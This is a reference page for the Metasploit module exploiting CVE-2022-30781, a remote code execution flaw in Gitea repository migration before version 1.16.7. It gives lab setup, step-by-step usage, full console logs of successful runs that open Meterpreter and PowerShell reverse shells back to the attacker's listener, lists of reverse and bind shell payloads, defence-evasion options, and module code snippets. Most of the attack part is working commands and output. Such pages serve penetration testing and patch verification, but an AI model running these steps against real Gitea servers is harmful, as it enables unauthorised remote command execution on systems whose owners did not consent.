Gitea Git Fetch Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/gitea_git_fetch_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Gitea Git Fetch Remote Code Execution
Module: exploit/multi/http/gitea_git_fetch_rce
Source code: modules/exploits/multi/http/gitea_git_fetch_rce.rb
Disclosure date: 2022-05-16
Last modification time: 2022-11-17 12:25:52 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-30781

This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage


msf > use exploit/multi/http/gitea_git_fetch_rce
msf exploit(gitea_git_fetch_rce) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

  • USERNAME: Username to authenticate with

  • PASSWORD: Password to use

Knowledge Base


Vulnerable Application


Gitea is a painless self-hosted Git service community managed lightweight code hosting solution written in Go.

This module has been tested successfully on Gitea versions: * 1.16.6 with Git 2.30.3 (Docker) * 1.16.6 with Git 2.30.2 (Windows 10)

Description

This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version.

The migration process require valid Git repository address so the module will use the Gitea target itself by creating a temporary repository. This scenario won't work with Gitea default configuration because ALLOW_LOCALNETWORKS is disabled. However, it will be ignored when ALLOWED_DOMAINS is set, but it must be set to all domain with * for this scenario to work.

There is an update in the Git-remote command line starting from version 2.34.0 which refuses to update the branch pull request URL to the current path.

\testrepo.git>git version
git version 2.34.0.windows.1
\testrepo.git>git remote add -f master ./
Updating master
fatal: bad object refs/pull/0/head
error: ./ did not send all necessary objects

error: Could not fetch master

This causes the exploit to fail because Git-fetch will not executed if the Git-remote fail. Details of these limitation are explained here

Source and Installers

Docker installation

  1. create docker-compose.yml file
    version: "3"

networks: gitea: external: false

services: server: image: gitea/gitea:1.16.6 container_name: gitea environment: - USER_UID=1000 - USER_GID=1000 restart: always networks: - gitea volumes: - ./gitea:/data - /etc/timezone:/etc/timezone:ro - /etc/localtime:/etc/localtime:ro ports: - "3000:3000" - "222:22" 2. run `docker-compose up` 3. append `ALLOW_LOCALNETWORKS` in the configuration file. :~$ cat << EOF >> gitea/gitea/conf/app.ini

[migrations] ALLOW_LOCALNETWORKS = true EOF
4. Navigate to the localhost port 3000 and finish the installation. Note that the first registered user will automatically become administrator so make sure to set the administrator username and password upon installation.

Verification Steps


  1. Navigate to /user/sign_up and register normal user
  2. Do: use unix/webapp/gitea_git_fetch_rce
  3. Do: set RHOSTS [ips]
  4. Do: set LHOST [lhost]
  5. Do: set USERNAME [username]
  6. Do: set PASSWORD [password]
  7. Do: run
  8. You should get a shell.

Options


USERNAME

The Gitea valid username to authenticate

USERNAME

The Gitea valid password to authenticate

HTTPDELAY

Number of seconds the web server will wait to deliver payload (default: 12)

Scenarios


Successful exploitation of Gitea 1.16.6 on Docker

msf6 > use exploit/multi/http/gitea_git_fetch_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
username => msf
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
password => qwerty
msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://172.17.0.1:8080/
[*] Server started.
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl
[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/topics
[*] Creating repository "u8W2Lu24p"
[+] Repository created
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgAB..."]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAA...
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Migrating repository
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:60744) at 2022-10-03 18:40:15 +0700
[*] Server stopped.

meterpreter > getuid
Server username: git

Successful exploitation of Gitea 1.16.6 on Windows 10

msf6 > use exploit/multi/http/gitea_git_fetch_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set target 2
target => 2
msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 192.168.0.104
lhost => 192.168.0.104
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username yo
username => yo
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password password
password => password
msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 192.168.0.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.0.104:8080/
[*] Server started.
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5
[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/pulls
[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/topics
[*] Creating repository "ExcLF0xBxG"
[+] Repository created
[*] Executing command: powershell.exe -nop -w hidden -noni -ep bypass "&([...
[*] Migrating repository
[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
[*] Migrating repository
[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
[*] Server stopped.

PS C:\Users\msf\Downloads\data\gitea-repositories\yo\gu5em72atm5.git> whoami
msf

Failed exploitation due to migration settings

msf6 > use exploit/multi/http/gitea_git_fetch_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
username => msf
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
password => qwerty
msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://172.17.0.1:8080/
[*] Server started.
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w
[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/pulls
[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/topics
[*] Creating repository "P7EpcvA"
[+] Repository created
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAA..."]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAAB...
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Migrating repository
[*] Server stopped.
[-] Exploit aborted due to failure: unexpected-reply: Unable to migrate repo:
You can not import from disallowed hosts, please ask the admin to check
ALLOWED_DOMAINS/ALLOW_LOCALNETWORKS/BLOCKED_DOMAINS settings.
[*] Exploit completed, but no session was created.

Go back to menu.

Msfconsole Usage


Here is how the multi/http/gitea_git_fetch_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/gitea_git_fetch_rce

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > show info

       Name: Gitea Git Fetch Remote Code Execution
     Module: exploit/multi/http/gitea_git_fetch_rce
   Platform: Unix, Linux, Windows
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-05-16

Provided by:
  wuhan005
  li4n0
  krastanoel

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper
  2   Windows Command
  3   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Password to use
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      3000             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all ad
                                        dresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The base path to the gitea application
  URIPATH    /                no        The URI to use for this exploit
  USERNAME                    yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits Git fetch command in Gitea repository migration 
  process that leads to a remote command execution on the system. This 
  vulnerability affect Gitea before 1.16.7 version.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-30781
  https://tttang.com/archive/1607/

View the full module info with the info -d command.

Module Options


This is a complete list of options available in the multi/http/gitea_git_fetch_rce exploit:

msf6 exploit(multi/http/gitea_git_fetch_rce) > show options

Module options (exploit/multi/http/gitea_git_fetch_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      3000             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all a
                                         ddresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the gitea application
   URIPATH    /                no        The URI to use for this exploit
   USERNAME                    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


View the full module info with the info, or info -d command.

Advanced Options


Here is a complete list of advanced options supported by the multi/http/gitea_git_fetch_rce exploit:

msf6 exploit(multi/http/gitea_git_fetch_rce) > show advanced

Module advanced options (exploit/multi/http/gitea_git_fetch_rce):

   Name                     Current Setting                               Required  Description
   ----                     ---------------                               --------  -----------
   AutoCheck                true                                          no        Run check before exploit
   CMDSTAGER::DECODER                                                     no        The decoder stub to use.
   CMDSTAGER::FLAVOR        auto                                          no        The CMD Stager to use. (Accepted: auto, curl, wget, echo, printf, psh_invokewebre
                                                                                    quest)
   CMDSTAGER::SSL           false                                         no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                        no        Writable directory for staged files
   CMDSTAGER::URIPATH                                                     no        Payload URI path for supported stagers
   ContextInformationFile                                                 no        The information file that contains context information
   DOMAIN                   WORKSTATION                                   yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                          no        Conform to IIS, should work for most servers. Only set to false for non-IIS serve
                                                                                    rs
   DisablePayloadHandler    false                                         no        Disable the handler code for the selected payload
   EXE::Custom                                                            no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                         no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                         no        Use the default template in case the specified one is missing
   EXE::Inject              false                                         no        Set to preserve the original EXE function
   EXE::OldMethod           false                                         no        Set to use the substitution EXE generation method.
   EXE::Path                                                              no        The directory in which to look for the executable template
   EXE::Template                                                          no        The executable template file name.
   EnableContextEncoding    false                                         no        Use transient context when encoding payloads
   FingerprintCheck         true                                          no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                         no        Override check result
   GITEACHECK               true                                          yes       Check if the website is a valid Gitea install
   HttpClientTimeout                                                      no        HTTP connection and receive timeout
   HttpPassword                                                           no        The HTTP password to specify for authentication
   HttpRawHeaders                                                         no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                         no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                       no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                         no        Show HTTP headers only in HttpTrace
   HttpUsername                                                           no        The HTTP username to specify for authentication
   ListenerBindAddress                                                    no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                       no        The port to bind to if different from SRVPORT
   ListenerComm                                                           no        The specific communication channel to use for this service
   MSI::Custom                                                            no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                         no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                              no        The directory in which to look for the msi template
   MSI::Template                                                          no        The msi template file name
   MSI::UAC                 false                                         no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                              no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression           false                                         no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                                no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                          yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate
                                                                                    ) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots               false                                         no        Return a robots.txt file if asked for one
   URIHOST                                                                no        Host to use in URI (useful for tunnels)
   URIPORT                                                                no        Port to use in URI (useful for tunnels)
   UserAgent                Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv  no        The User-Agent header to use for all requests
                            :97.0) Gecko/20100101 Firefox/97.0
   VERBOSE                  false                                         no        Enable detailed status messages
   WORKSPACE                                                              no        Specify the workspace for this module
   WfsDelay                 30                                            no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meter
                                                           preter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         false            no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOS
                                                           T
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

View the full module info with the info, or info -d command.

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/gitea_git_fetch_rce module can exploit:

msf6 exploit(multi/http/gitea_git_fetch_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper
   2   Windows Command
   3   Windows Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/gitea_git_fetch_rce exploit:

msf6 exploit(multi/http/gitea_git_fetch_rce) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                       normal  No     Interact with Established SSH Connection
   5   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   6   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   7   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   8   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   9   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   10  payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   11  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   12  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   13  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   14  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   15  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   16  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   17  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   18  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   19  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   20  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   21  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   22  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   26  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   27  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   28  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   29  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   32  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   33  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   34  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   35  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   36  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   37  payload/linux/x86/read_file                                        normal  No     Linux Read File
   38  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   41  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   42  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   43  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   44  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   47  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   48  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   49  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   50  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   51  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/gitea_git_fetch_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/gitea_git_fetch_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-r
                                                            andom)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to remove repository '<NAME>'


Here is a relevant code snippet related to the "Unable to remove repository '<NAME>'" error message:

108:	    return if @uid.nil? || @migrate_repo_created.nil?
109:	
110:	    [@repo_name, @migrate_repo_name].each do |name|
111:	      res = gitea_remove_repo(repo_path(name))
112:	      if res.nil? || res&.code == 200
113:	        vprint_warning("Unable to remove repository '#{name}'")
114:	      elsif res&.code == 404
115:	        vprint_warning("Repository '#{name}' not found, possibly already deleted")
116:	      else
117:	        vprint_status("Successfully cleanup repository '#{name}'")
118:	      end

Repository '<NAME>' not found, possibly already deleted


Here is a relevant code snippet related to the "Repository '<NAME>' not found, possibly already deleted" error message:

110:	    [@repo_name, @migrate_repo_name].each do |name|
111:	      res = gitea_remove_repo(repo_path(name))
112:	      if res.nil? || res&.code == 200
113:	        vprint_warning("Unable to remove repository '#{name}'")
114:	      elsif res&.code == 404
115:	        vprint_warning("Repository '#{name}' not found, possibly already deleted")
116:	      else
117:	        vprint_status("Successfully cleanup repository '#{name}'")
118:	      end
119:	    end
120:	  end

USERNAME can't be blank


Here is a relevant code snippet related to the "USERNAME can't be blank" error message:

118:	      end
119:	    end
120:	  end
121:	
122:	  def check
123:	    return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?
124:	
125:	    v = get_gitea_version
126:	    gitea_login(datastore['username'], datastore['password'])
127:	
128:	    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')

Version detected: <V>


Here is a relevant code snippet related to the "Version detected: <V>" error message:

124:	
125:	    v = get_gitea_version
126:	    gitea_login(datastore['username'], datastore['password'])
127:	
128:	    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')
129:	      return CheckCode::Appears("Version detected: #{v}")
130:	    end
131:	
132:	    CheckCode::Safe("Version detected: #{v}")
133:	  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e
134:	    return CheckCode::Unknown(e.message)

Version detected: <V>


Here is a relevant code snippet related to the "Version detected: <V>" error message:

127:	
128:	    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')
129:	      return CheckCode::Appears("Version detected: #{v}")
130:	    end
131:	
132:	    CheckCode::Safe("Version detected: #{v}")
133:	  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e
134:	    return CheckCode::Unknown(e.message)
